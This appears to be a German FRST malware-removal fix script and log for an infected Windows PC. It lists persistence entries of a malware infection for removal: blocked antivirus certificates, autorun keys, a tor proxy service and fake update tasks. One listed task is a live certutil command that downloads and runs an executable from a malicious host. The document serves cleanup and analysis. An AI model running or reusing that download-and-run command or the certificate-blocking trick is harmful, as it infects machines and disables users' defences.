HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
C:\Program Files\RDH9TH3UTU
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
C:\Users\Nico\AppData\Roaming\okdd3kogot1
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
C:\Program Files (x86)\eu0vb4pykb5
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
C:\Users\Nico\AppData\Local\pfialx.dll
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
C:\Program Files\I88TDHYW3R
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe 
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
C:\Users\Nico\AppData\Roaming\EpicNet Inc
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Logic Cramble
R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
C:\Users\Nico\AppData\Local\XService
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
C:\Program Files\SystemaRev
R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
Unlock: C:\Windows\windefender.exe
C:\Windows\windefender.exe
R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
C:\Windows\qcusolizqbhuglpw.qcus
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
C:\ProgramData\PrefsSecure
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\csrss
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
Folder: C:\Windows\rss
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\resolve_run" => erfolgreich entfernt
C:\Program Files (x86)\Common Files\new.bat => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Chrome Update Helper" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => erfolgreich entfernt
